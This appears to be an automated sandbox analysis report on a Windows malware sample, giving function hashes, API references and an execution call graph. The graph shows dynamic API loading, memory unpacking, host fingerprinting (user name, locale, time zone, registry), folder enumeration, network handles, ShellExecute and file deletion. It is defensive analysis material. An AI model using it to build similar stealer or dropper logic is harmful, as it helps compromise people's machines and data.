                                                                                                                                                                        • Instruction ID: 6a8d78a9addc34f3ad7b00732ff531346a2d7fbc9811f2eeef7983ee3703c0e6
                                                                                                                                                                        • Opcode Fuzzy Hash: 8050f4bc507ec0bb941bc43ca6d5d4e1f6f56b66609b99a9966d1b80a37584e8
                                                                                                                                                                        • Instruction Fuzzy Hash: 7041E671E06228DFDB64CF58D8A9BAEB7B5FB48300F20969AD008A7240C7395E84CF45
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __getptd.LIBCMTD ref: 0041AEAD
                                                                                                                                                                          • Part of subcall function 0041BCB0: __getptd_noexit.LIBCMTD ref: 0041BCB6
                                                                                                                                                                          • Part of subcall function 0041BCB0: __amsg_exit.LIBCMTD ref: 0041BCC6
                                                                                                                                                                        • __getptd.LIBCMTD ref: 0041AEBB
                                                                                                                                                                        • ___DestructExceptionObject.LIBCMTD ref: 0041AF28
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __getptd$DestructExceptionObject__amsg_exit__getptd_noexit
                                                                                                                                                                        • String ID: csm
                                                                                                                                                                        • API String ID: 4182212180-1018135373
                                                                                                                                                                        • Opcode ID: 0c34df0d760dd2be17682900818bc7e984008826c765d5e1224b71bd8f6bbe05
                                                                                                                                                                        • Instruction ID: 3e0ef99184adc83b36a3de020c612cd6e5a1dcf5289a61a20a03a7259e04c887
                                                                                                                                                                        • Opcode Fuzzy Hash: 0c34df0d760dd2be17682900818bc7e984008826c765d5e1224b71bd8f6bbe05
                                                                                                                                                                        • Instruction Fuzzy Hash: 161158B49122089BCF04DF51D1409EB7B72BF44359F90806AE8084B301D739EED2CBDA
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __errno$__getptd_noexit_memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2566647553-0
                                                                                                                                                                        • Opcode ID: 1b48cd490129e75590af3b027f3b6103edbc69c545417cd468af48ab97c2e8e5
                                                                                                                                                                        • Instruction ID: d37dbc28f95ddef8e69025ae021ec1e05b2bb3543eccda486b0baf71b08d6c61
                                                                                                                                                                        • Opcode Fuzzy Hash: 1b48cd490129e75590af3b027f3b6103edbc69c545417cd468af48ab97c2e8e5
                                                                                                                                                                        • Instruction Fuzzy Hash: D6318430A00219EADF20DF54E9457AE7770EF51339F64826BE4292A3E1D3794D81CB9A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __whiteout.LIBCMTD ref: 0042059F
                                                                                                                                                                        • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004215A6
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Locale$UpdateUpdate::~___whiteout
                                                                                                                                                                        • String ID: n
                                                                                                                                                                        • API String ID: 2661511698-2013832146
                                                                                                                                                                        • Opcode ID: a33af23d6a0fab86e66f612ac922636c844993ceb07215517b78c2e6999f35a1
                                                                                                                                                                        • Instruction ID: 0ed35de28cb5c4300c01912a322ac160f30ea6637afc2d79283bb38ba67d480f
                                                                                                                                                                        • Opcode Fuzzy Hash: a33af23d6a0fab86e66f612ac922636c844993ceb07215517b78c2e6999f35a1
                                                                                                                                                                        • Instruction Fuzzy Hash: 0641BF70A01269DBCF24CF55E4947EEBBF0AF41315F5481DBE8566A292C2388EC1CF59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __whiteout.LIBCMTD ref: 0042059F
                                                                                                                                                                        • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004215A6
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Locale$UpdateUpdate::~___whiteout
                                                                                                                                                                        • String ID: n
                                                                                                                                                                        • API String ID: 2661511698-2013832146
                                                                                                                                                                        • Opcode ID: 5f2175965e7bc0c0ed41a6cc2b9d15174e87f48c80463089164edb535b038560
                                                                                                                                                                        • Instruction ID: 0ed35de28cb5c4300c01912a322ac160f30ea6637afc2d79283bb38ba67d480f
                                                                                                                                                                        • Opcode Fuzzy Hash: 5f2175965e7bc0c0ed41a6cc2b9d15174e87f48c80463089164edb535b038560
                                                                                                                                                                        • Instruction Fuzzy Hash: 0641BF70A01269DBCF24CF55E4947EEBBF0AF41315F5481DBE8566A292C2388EC1CF59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __whiteout.LIBCMTD ref: 0042059F
                                                                                                                                                                        • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004215A6
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Locale$UpdateUpdate::~___whiteout
                                                                                                                                                                        • String ID: n
                                                                                                                                                                        • API String ID: 2661511698-2013832146
                                                                                                                                                                        • Opcode ID: bfd66062e8e27a280552f7e2b3ad207d37083d325a47f0f773fbd0b790f8c2e7
                                                                                                                                                                        • Instruction ID: d47c12be78318011e057a18be39ad1a7240684078ae5c7abe8e65317bfe61cd6
                                                                                                                                                                        • Opcode Fuzzy Hash: bfd66062e8e27a280552f7e2b3ad207d37083d325a47f0f773fbd0b790f8c2e7
                                                                                                                                                                        • Instruction Fuzzy Hash: AE319170A01268EBCF24CF55E4947EEBBF0AF11315F5041DBE85666252C2388EC1CF59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Locale__hextodec__inc__un_inc_isdigit_isxdigit$UpdateUpdate::~_
                                                                                                                                                                        • String ID: p
                                                                                                                                                                        • API String ID: 1652772854-2181537457
                                                                                                                                                                        • Opcode ID: 7e471efdfc92bb58afa428daf1570721bc5bde3b08cbc77e8dd7330fa0d0a624
                                                                                                                                                                        • Instruction ID: ab9035c48991bbb2de8ccdc8194c1671506a212b0df9223f12cb3ba8c7c441a8
                                                                                                                                                                        • Opcode Fuzzy Hash: 7e471efdfc92bb58afa428daf1570721bc5bde3b08cbc77e8dd7330fa0d0a624
                                                                                                                                                                        • Instruction Fuzzy Hash: 272145B4E052798ACB29CF65E8543EEBBF1AB45304F5441DBC41966203D2385A81DF49
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:5.3%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:61%
                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                        Total number of Nodes:1176
                                                                                                                                                                        Total number of Limit Nodes:2
                                                                                                                                                                        execution_graph 8617 239057b 8618 239057f LoadLibraryW 8617->8618 8619 2390cf1 8618->8619 8620 239059b LoadLibraryW 8618->8620 8622 239062e GetProcAddress 8620->8622 8624 239081e GetProcAddress 8622->8624 8626 23908f0 GetProcAddress 8624->8626 8628 2390a52 GetProcAddress 8626->8628 8629 2390a73 GetProcAddress 8628->8629 8631 2390b48 GetProcAddress 8629->8631 8633 2390c7d GetProcAddress 8631->8633 8634 2390c9b GetProcAddress GetProcAddress 8633->8634 8634->8619 8049 239efe0 8050 239f003 8049->8050 8055 239e620 8050->8055 8052 239f0ef 8058 239eb40 VirtualProtect 8052->8058 8056 239e661 8055->8056 8057 239e694 VirtualAlloc 8056->8057 8057->8052 8060 239eb8c 8058->8060 8059 239eddd 8060->8059 8061 239edaf VirtualProtect 8060->8061 8061->8060 9439 239e740 9440 239e620 VirtualAlloc 9439->9440 9441 239e74d 9440->9441 8636 2396ce3 8720 239057f LoadLibraryW 8636->8720 8640 2396d07 8741 239359b 8640->8741 8643 2396d6a ExitProcess 8644 2396d5f CreateMutexW 8645 2396d72 8644->8645 8941 2399632 GetCurrentProcess 8645->8941 8647 2396d77 8947 2399b6e 8647->8947 8651 2396e18 8953 2399a77 8651->8953 8653 2396e32 8654 2399a77 GlobalFree 8653->8654 8655 2396e3f 8654->8655 8656 2399a77 GlobalFree 8655->8656 8657 2396e48 8656->8657 8658 2399a77 GlobalFree 8657->8658 8659 2396e55 8658->8659 8660 2399a77 GlobalFree 8659->8660 8664 2396e5f 8660->8664 8661 2399a36 MultiByteToWideChar 8661->8664 8662 2399a77 GlobalFree 8662->8664 8664->8661 8664->8662 8665 2396f07 8664->8665 8956 23971d6 8664->8956 8962 23997be 8665->8962 8668 23971b2 ExitProcess 8672 2396f73 ExitProcess 8673 2396f6b 8674 2396fa9 ExitProcess 8673->8674 8675 2396fb1 8673->8675 8676 2399a77 GlobalFree 8675->8676 8677 2396fbb 8676->8677 8678 2399a77 GlobalFree 8677->8678 8679 2396fee 8678->8679 8680 2399a77 GlobalFree 8679->8680 8681 2396ffb 8680->8681 8682 2399a77 GlobalFree 8681->8682 8683 2397022 8682->8683 8684 2399a77 GlobalFree 8683->8684 8685 239702f SetCurrentDirectoryW 8684->8685 8686 239704a GetEnvironmentVariableW 8685->8686 8687 2399a77 GlobalFree 8686->8687 8688 239706b 8687->8688 8689 2399a77 GlobalFree 8688->8689 8690 2397075 SetEnvironmentVariableW 8689->8690 8691 239708b 8690->8691 8971 2398e7a 8691->8971 8694 23970ac 8696 23970fa 8694->8696 8698 23970d0 SHGetSpecialFolderPathW 8694->8698 9013 2399d4e 8696->9013 9002 2395b4c 8698->9002 8710 2397135 8711 2397164 8710->8711 9050 2398051 GetDesktopWindow 8710->9050 9064 239693b 8711->9064 8715 239717b FreeLibrary 8716 2397182 DeleteFileW 8715->8716 8717 2397193 8716->8717 8718 239719a FreeLibrary 8717->8718 8719 23971a1 DeleteFileW 8717->8719 8718->8719 8719->8668 8721 2390cf1 CoInitialize 8720->8721 8722 239059b LoadLibraryW 8720->8722 8738 2399a36 8721->8738 8724 239062e GetProcAddress 8722->8724 8726 239081e GetProcAddress 8724->8726 8728 23908f0 GetProcAddress 8726->8728 8730 2390a52 GetProcAddress 8728->8730 8731 2390a73 GetProcAddress 8730->8731 8733 2390b48 GetProcAddress 8731->8733 8735 2390c7d GetProcAddress 8733->8735 8736 2390c9b GetProcAddress GetProcAddress 8735->8736 8736->8721 8739 2399a43 MultiByteToWideChar 8738->8739 8739->8640 8742 23935af 8741->8742 8743 2399a36 MultiByteToWideChar 8742->8743 8744 2393f50 8743->8744 8745 2399a36 MultiByteToWideChar 8744->8745 8746 2393f60 8745->8746 8747 2399a36 MultiByteToWideChar 8746->8747 8748 2393f70 8747->8748 8749 2399a36 MultiByteToWideChar 8748->8749 8750 2393f80 8749->8750 8751 2399a36 MultiByteToWideChar 8750->8751 8752 2393f90 8751->8752 8753 2399a36 MultiByteToWideChar 8752->8753 8754 2393fa0 8753->8754 8755 2399a36 MultiByteToWideChar 8754->8755 8756 2393fb0 8755->8756 8757 2399a36 MultiByteToWideChar 8756->8757 8758 2393fc0 8757->8758 8759 2399a36 MultiByteToWideChar 8758->8759 8760 2393fd0 8759->8760 8761 2399a36 MultiByteToWideChar 8760->8761 8762 2393fe0 8761->8762 8763 2399a36 MultiByteToWideChar 8762->8763 8764 2393ff0 8763->8764 8765 2399a36 MultiByteToWideChar 8764->8765 8766 2394000 8765->8766 8767 2399a36 MultiByteToWideChar 8766->8767 8768 2394010 8767->8768 8769 2399a36 MultiByteToWideChar 8768->8769 8770 2394020 8769->8770 8771 2399a36 MultiByteToWideChar 8770->8771 8772 2394030 8771->8772 8773 2399a36 MultiByteToWideChar 8772->8773 8774 2394040 8773->8774 8775 2399a36 MultiByteToWideChar 8774->8775 8776 2394050 8775->8776 8777 2399a36 MultiByteToWideChar 8776->8777 8778 2394060 8777->8778 8779 2399a36 MultiByteToWideChar 8778->8779 8780 2394070 8779->8780 8781 2399a36 MultiByteToWideChar 8780->8781 8782 2394080 8781->8782 8783 2399a36 MultiByteToWideChar 8782->8783 8784 2394090 8783->8784 8785 2399a36 MultiByteToWideChar 8784->8785 8786 23940a0 8785->8786 8787 2399a36 MultiByteToWideChar 8786->8787 8788 23940b0 8787->8788 8789 2399a36 MultiByteToWideChar 8788->8789 8790 23940c0 8789->8790 8791 2399a36 MultiByteToWideChar 8790->8791 8792 23940d0 8791->8792 8793 2399a36 MultiByteToWideChar 8792->8793 8794 23940e0 8793->8794 8795 2399a36 MultiByteToWideChar 8794->8795 8796 23940f0 8795->8796 8797 2399a36 MultiByteToWideChar 8796->8797 8798 2394100 8797->8798 8799 2399a36 MultiByteToWideChar 8798->8799 8800 2394110 8799->8800 8801 2399a36 MultiByteToWideChar 8800->8801 8802 2394120 8801->8802 8803 2399a36 MultiByteToWideChar 8802->8803 8804 2394130 8803->8804 8805 2399a36 MultiByteToWideChar 8804->8805 8806 2394140 8805->8806 8807 2399a36 MultiByteToWideChar 8806->8807 8808 2394150 8807->8808 8809 2399a36 MultiByteToWideChar 8808->8809 8810 2394160 8809->8810 8811 2399a36 MultiByteToWideChar 8810->8811 8812 2394170 8811->8812 8813 2399a36 MultiByteToWideChar 8812->8813 8814 2394180 8813->8814 8815 2399a36 MultiByteToWideChar 8814->8815 8816 2394190 8815->8816 8817 2399a36 MultiByteToWideChar 8816->8817 8818 23941a0 8817->8818 8819 2399a36 MultiByteToWideChar 8818->8819 8820 23941b0 8819->8820 8821 2399a36 MultiByteToWideChar 8820->8821 8822 23941c0 8821->8822 8823 2399a36 MultiByteToWideChar 8822->8823 8824 23941d0 8823->8824 8825 2399a36 MultiByteToWideChar 8824->8825 8826 23941e0 8825->8826 8827 2399a36 MultiByteToWideChar 8826->8827 8828 23941f0 8827->8828 8829 2399a36 MultiByteToWideChar 8828->8829 8830 2394200 8829->8830 8831 2399a36 MultiByteToWideChar 8830->8831 8832 2394210 8831->8832 8833 2399a36 MultiByteToWideChar 8832->8833 8834 2394220 8833->8834 8835 2399a36 MultiByteToWideChar 8834->8835 8836 2394230 8835->8836 8837 2399a36 MultiByteToWideChar 8836->8837 8838 2394240 8837->8838 8839 2399a36 MultiByteToWideChar 8838->8839 8840 2394250 8839->8840 8841 2399a36 MultiByteToWideChar 8840->8841 8842 2394260 8841->8842 8843 2399a36 MultiByteToWideChar 8842->8843 8844 2394270 8843->8844 8845 2399a36 MultiByteToWideChar 8844->8845 8846 2394280 8845->8846 8847 2399a36 MultiByteToWideChar 8846->8847 8848 2394290 8847->8848 8849 2399a36 MultiByteToWideChar 8848->8849 8850 23942a0 8849->8850 8851 2399a36 MultiByteToWideChar 8850->8851 8852 23942b0 8851->8852 8853 2399a36 MultiByteToWideChar 8852->8853 8854 23942c0 8853->8854 8855 2399a36 MultiByteToWideChar 8854->8855 8856 23942d0 8855->8856 8857 2399a36 MultiByteToWideChar 8856->8857 8858 23942e0 8857->8858 8859 2399a36 MultiByteToWideChar 8858->8859 8860 23942f0 8859->8860 8861 2399a36 MultiByteToWideChar 8860->8861 8862 2394300 8861->8862 8863 2399a36 MultiByteToWideChar 8862->8863 8864 2394310 8863->8864 8865 2399a36 MultiByteToWideChar 8864->8865 8866 2394320 8865->8866 8867 2399a36 MultiByteToWideChar 8866->8867 8868 2394330 8867->8868 8869 2399a36 MultiByteToWideChar 8868->8869 8870 2394340 8869->8870 8871 2399a36 MultiByteToWideChar 8870->8871 8872 2394350 8871->8872 8873 2399a36 MultiByteToWideChar 8872->8873 8874 2394360 8873->8874 8875 2399a36 MultiByteToWideChar 8874->8875 8876 2394370 8875->8876 8877 2399a36 MultiByteToWideChar 8876->8877 8878 239437b 8877->8878 8879 2399a36 MultiByteToWideChar 8878->8879 8880 2394386 8879->8880 8881 2399a36 MultiByteToWideChar 8880->8881 8882 2394391 8881->8882 8883 2399a36 MultiByteToWideChar 8882->8883 8884 239439c 8883->8884 8885 2399a36 MultiByteToWideChar 8884->8885 8886 23943a7 8885->8886 8887 2399a36 MultiByteToWideChar 8886->8887 8888 23943b2 8887->8888 8889 2399a36 MultiByteToWideChar 8888->8889 8890 23943bd 8889->8890 8891 2399a36 MultiByteToWideChar 8890->8891 8892 23943c8 8891->8892 8893 2399a36 MultiByteToWideChar 8892->8893 8894 23943d3 8893->8894 8895 2399a36 MultiByteToWideChar 8894->8895 8896 23943de 8895->8896 8897 2399a36 MultiByteToWideChar 8896->8897 8898 23943e9 8897->8898 8899 2399a36 MultiByteToWideChar 8898->8899 8900 23943f4 8899->8900 8901 2399a36 MultiByteToWideChar 8900->8901 8902 23943ff 8901->8902 8903 2399a36 MultiByteToWideChar 8902->8903 8904 239440a 8903->8904 8905 2399a36 MultiByteToWideChar 8904->8905 8906 2394415 8905->8906 8907 2399a36 MultiByteToWideChar 8906->8907 8908 2394425 8907->8908 8909 2399a36 MultiByteToWideChar 8908->8909 8910 2394435 8909->8910 8911 2399a36 MultiByteToWideChar 8910->8911 8912 2394440 8911->8912 8913 2399a36 MultiByteToWideChar 8912->8913 8914 239444b 8913->8914 8915 2399a36 MultiByteToWideChar 8914->8915 8916 2394456 8915->8916 8917 2399a36 MultiByteToWideChar 8916->8917 8918 2394461 8917->8918 8919 2399a36 MultiByteToWideChar 8918->8919 8920 239446c 8919->8920 8921 2399a36 MultiByteToWideChar 8920->8921 8922 2394477 8921->8922 8923 2399a36 MultiByteToWideChar 8922->8923 8924 2394482 8923->8924 8925 2399a36 MultiByteToWideChar 8924->8925 8926 239448d 8925->8926 8927 2399a36 MultiByteToWideChar 8926->8927 8928 2394498 8927->8928 8929 2399a36 MultiByteToWideChar 8928->8929 8930 23944a3 8929->8930 8931 2399a36 MultiByteToWideChar 8930->8931 8932 23944ae 8931->8932 8933 2399a36 MultiByteToWideChar 8932->8933 8934 23944b9 8933->8934 8935 2399a36 MultiByteToWideChar 8934->8935 8936 23944c9 8935->8936 8937 2399a36 MultiByteToWideChar 8936->8937 8938 23944d9 8937->8938 8939 2399a36 MultiByteToWideChar 8938->8939 8940 23944e9 8939->8940 8940->8643 8940->8644 8942 2399653 8941->8942 8943 23996dd 8942->8943 8944 2399676 GetLastError 8942->8944 8945 2399681 8942->8945 8943->8647 8944->8943 8944->8945 8945->8943 8946 23996d2 GlobalFree 8945->8946 8946->8943 8948 2399b84 8947->8948 8949 2399bd7 RegCloseKey 8948->8949 8950 2396e11 8948->8950 8949->8950 8951 2399be6 8950->8951 8952 2399c00 GetUserNameW 8951->8952 8952->8651 8954 2399a8c 8953->8954 8955 2399ac1 GlobalFree 8954->8955 8955->8653 8958 23971f3 8956->8958 8957 23973bf InternetCloseHandle 8960 23973c6 8957->8960 8958->8957 8959 23973b6 InternetCloseHandle 8958->8959 8958->8960 8961 23973ac InternetCloseHandle 8958->8961 8959->8957 8960->8664 8961->8959 8963 23997d0 8962->8963 8964 2399a77 GlobalFree 8963->8964 8965 2396f45 8963->8965 8964->8965 8965->8668 8966 2397bc0 8965->8966 8969 2397bdc 8966->8969 8967 2396f57 8967->8672 8967->8673 8968 2399a77 GlobalFree 8968->8969 8969->8967 8969->8968 9071 2397a09 8969->9071 8972 2398e94 8971->8972 8994 2397092 8972->8994 9077 23985d8 8972->9077 8990 239900f 8991 2399a77 GlobalFree 8990->8991 8990->8994 8992 2399081 8991->8992 8992->8994 9140 239744f 8992->9140 8994->8694 8995 2393511 8994->8995 8996 239352c SHGetSpecialFolderPathW SHGetSpecialFolderPathW 8995->8996 9166 2391079 8996->9166 9003 2395b57 GetProcAddress 9002->9003 9005 2395c30 9002->9005 9003->9005 9005->8696 9006 23958b2 9005->9006 9007 2395918 9006->9007 9010 23958d3 9006->9010 9007->8696 9008 2395984 FindClose 9008->9007 9009 2395947 PathCombineW 9351 2395c99 9009->9351 9010->9007 9010->9008 9010->9009 9012 23958b2 20 API calls 9010->9012 9012->9010 9016 2399d69 9013->9016 9014 2397111 9019 239a14c 9014->9019 9016->9014 9017 2399a77 GlobalFree 9016->9017 9018 239744f 10 API calls 9016->9018 9397 239a6eb 9016->9397 9017->9016 9018->9016 9020 239a178 9019->9020 9413 239a37a 9020->9413 9022 239a18c 9023 239a37a 6 API calls 9022->9023 9024 239a262 9022->9024 9026 239711a 9022->9026 9023->9022 9025 2399a77 GlobalFree 9024->9025 9024->9026 9027 239a2b8 9025->9027 9029 2394b2a 9026->9029 9027->9026 9028 239744f 10 API calls 9027->9028 9028->9026 9031 2394b42 9029->9031 9030 2394fa9 9034 239914d 9030->9034 9031->9030 9032 2399a77 GlobalFree 9031->9032 9033 239744f 10 API calls 9031->9033 9032->9031 9033->9031 9035 239916f 9034->9035 9039 239712c 9035->9039 9429 239484e 9035->9429 9037 2399379 9038 2399a77 GlobalFree 9037->9038 9037->9039 9040 23993c9 9038->9040 9042 23944f2 9039->9042 9040->9039 9041 239744f 10 API calls 9040->9041 9041->9039 9044 2394514 9042->9044 9043 239451a 9043->8710 9044->9043 9045 239484e 4 API calls 9044->9045 9046 239471e 9045->9046 9046->9043 9047 2399a77 GlobalFree 9046->9047 9048 239476e 9047->9048 9048->9043 9049 239744f 10 API calls 9048->9049 9049->9043 9051 239808c 9050->9051 9052 23981ed GetClientRect 9051->9052 9061 23984b1 9051->9061 9053 2398202 9052->9053 9054 2399c12 GlobalFree 9053->9054 9053->9061 9055 23982cc 9054->9055 9056 2399a77 GlobalFree 9055->9056 9055->9061 9057 2398351 9056->9057 9058 23983c0 CloseHandle DeleteFileW 9057->9058 9059 239838e 9057->9059 9058->9059 9060 2399a77 GlobalFree 9059->9060 9062 239842b 9060->9062 9061->8711 9062->9061 9063 239744f 10 API calls 9062->9063 9063->9061 9068 2396950 9064->9068 9065 2396c29 ShellExecuteW 9065->9068 9066 2396c7a 9066->8715 9066->8716 9067 2399a77 GlobalFree 9067->9068 9068->9065 9068->9066 9068->9067 9069 2397a09 2 API calls 9068->9069 9070 2396bdf ShellExecuteW 9068->9070 9069->9068 9070->9068 9073 2397a28 9071->9073 9072 2397a96 lstrlenW 9074 2397aaf 9072->9074 9073->9072 9073->9073 9076 2397b6c 9073->9076 9075 2397b7a CloseHandle 9074->9075 9074->9076 9075->9076 9076->8969 9078 23985ec GetUserDefaultLCID 9077->9078 9080 2398619 wsprintfW 9078->9080 9081 2399a77 GlobalFree 9080->9081 9082 2398636 9081->9082 9083 2398710 GetTimeZoneInformation 9082->9083 9084 2398736 wsprintfW 9083->9084 9085 2399a77 GlobalFree 9084->9085 9086 2398768 9085->9086 9087 2398650 9086->9087 9088 239866d 9087->9088 9089 23986b9 RegCloseKey 9088->9089 9090 23986a3 RegQueryValueExW 9088->9090 9091 23986ca 9089->9091 9090->9089 9092 23986da wsprintfW 9091->9092 9094 23986cf 9091->9094 9093 2399a77 GlobalFree 9092->9093 9093->9094 9095 23987d9 9094->9095 9096 23987ec 9095->9096 9097 23987fe wsprintfW 9096->9097 9098 23987f0 GetLastError 9096->9098 9100 2399a77 GlobalFree 9097->9100 9098->9097 9101 2398831 9100->9101 9102 2398843 9101->9102 9103 2398865 9102->9103 9104 2398935 GetSystemInfo 9103->9104 9108 239896c 9103->9108 9105 2399a36 MultiByteToWideChar 9104->9105 9106 2398949 wsprintfW 9105->9106 9107 2399a77 GlobalFree 9106->9107 9107->9108 9109 239899e 9108->9109 9110 23989b6 9109->9110 9111 23989ba 9110->9111 9112 23989cd wsprintfW 9110->9112 9114 239877a 9111->9114 9113 2399a77 GlobalFree 9112->9113 9113->9111 9115 239878e 9114->9115 9116 2399a77 GlobalFree 9115->9116 9117 23987c6 9116->9117 9118 2398a0c 9117->9118 9120 2398a29 9118->9120 9119 2398ae2 9122 2398af5 9119->9122 9120->9119 9121 2399a77 GlobalFree 9120->9121 9121->9120 9123 2399a77 GlobalFree 9122->9123 9124 2398b16 9123->9124 9125 2398b37 RegCloseKey 9124->9125 9134 2398b47 9124->9134 9126 2398e74 9125->9126 9126->8990 9127 2398cbf RegCloseKey 9138 2398ce6 9127->9138 9128 2398bab RegCloseKey 9128->9134 9129 2398e68 RegCloseKey 9129->9126 9130 2398c9f RegCloseKey 9130->9134 9131 2398e65 9131->9129 9132 2398c53 wsprintfW 9132->9134 9133 2398d51 RegCloseKey 9133->9138 9134->9127 9134->9128 9134->9130 9134->9132 9135 2399a77 GlobalFree 9134->9135 9135->9134 9136 2398e45 RegCloseKey 9136->9138 9137 2398df9 wsprintfW 9137->9138 9138->9129 9138->9131 9138->9133 9138->9136 9138->9137 9139 2399a77 GlobalFree 9138->9139 9139->9138 9152 239746b 9140->9152 9141 2399a36 MultiByteToWideChar 9141->9152 9142 2399a77 GlobalFree 9142->9152 9143 23977e6 9163 2399ad1 9143->9163 9145 2397804 9146 2399ad1 GlobalFree 9145->9146 9147 2397811 9146->9147 9148 2399ad1 GlobalFree 9147->9148 9149 239781b 9148->9149 9150 2399ad1 GlobalFree 9149->9150 9153 2397828 InternetSetOptionW InternetSetOptionW 9150->9153 9151 2399ad1 GlobalFree 9160 23975d4 9151->9160 9152->9141 9152->9142 9157 2397647 9152->9157 9152->9160 9153->9157 9161 23978a3 9153->9161 9155 2397973 InternetCloseHandle 9155->9157 9156 239796a InternetCloseHandle 9156->9155 9157->8994 9158 2397960 InternetCloseHandle 9158->9156 9159 23977bf DeleteFileW 9159->9160 9160->9143 9160->9151 9160->9157 9160->9159 9162 23977a2 CloseHandle 9160->9162 9161->9155 9161->9156 9161->9158 9162->9160 9164 2399aec 9163->9164 9165 2399b5e GlobalFree 9164->9165 9165->9145 9167 23910d8 9166->9167 9172 2391094 9166->9172 9174 2390ee2 9167->9174 9168 23911ed FindClose 9168->9167 9169 2391112 PathCombineW 9169->9172 9171 2391156 PathCombineW 9171->9172 9172->9167 9172->9168 9172->9169 9172->9171 9173 2391079 30 API calls 9172->9173 9182 239138c 9172->9182 9173->9172 9175 2390f43 9174->9175 9178 2390eff 9174->9178 9175->8694 9176 2390fc1 FindClose 9176->9175 9177 2390f79 PathCombineW 9177->9178 9178->9175 9178->9176 9178->9177 9179 239138c 30 API calls 9178->9179 9180 239100d PathCombineW 9178->9180 9181 2390ee2 30 API calls 9178->9181 9179->9178 9180->9178 9181->9178 9183 23913b5 9182->9183 9184 23913ed PathCombineW 9183->9184 9187 23913ff 9183->9187 9199 23917f8 9184->9199 9185 23918a2 wsprintfW 9186 23918b2 PathCombineW 9185->9186 9186->9199 9188 239141e 9187->9188 9253 23911fb 9187->9253 9188->9172 9191 23911fb 4 API calls 9191->9199 9194 2391d2c 5 API calls 9194->9199 9197 239222c 6 API calls 9197->9199 9199->9185 9199->9186 9199->9188 9199->9191 9199->9194 9199->9197 9201 2392cd4 3 API calls 9199->9201 9203 23927aa 5 API calls 9199->9203 9234 2393203 5 API calls 9199->9234 9249 2399a77 GlobalFree 9199->9249 9252 239744f 10 API calls 9199->9252 9201->9199 9203->9199 9205 2399a77 GlobalFree 9207 2391555 9205->9207 9206 2391583 9212 2399a77 GlobalFree 9206->9212 9219 2391600 9206->9219 9208 2399a77 GlobalFree 9207->9208 9209 2391562 9208->9209 9210 2399a77 GlobalFree 9209->9210 9211 239156c 9210->9211 9213 2399a77 GlobalFree 9211->9213 9214 23915d2 9212->9214 9215 2391579 9213->9215 9216 2399a77 GlobalFree 9214->9216 9218 2399a77 GlobalFree 9215->9218 9217 23915df 9216->9217 9221 2399a77 GlobalFree 9217->9221 9218->9206 9220 239167a 9219->9220 9222 2399a77 GlobalFree 9219->9222 9226 23916eb 9220->9226 9230 2399a77 GlobalFree 9220->9230 9223 23915e9 9221->9223 9224 239164c 9222->9224 9225 2399a77 GlobalFree 9223->9225 9227 2399a77 GlobalFree 9224->9227 9228 23915f6 9225->9228 9319 2393203 9226->9319 9231 2391659 9227->9231 9233 2399a77 GlobalFree 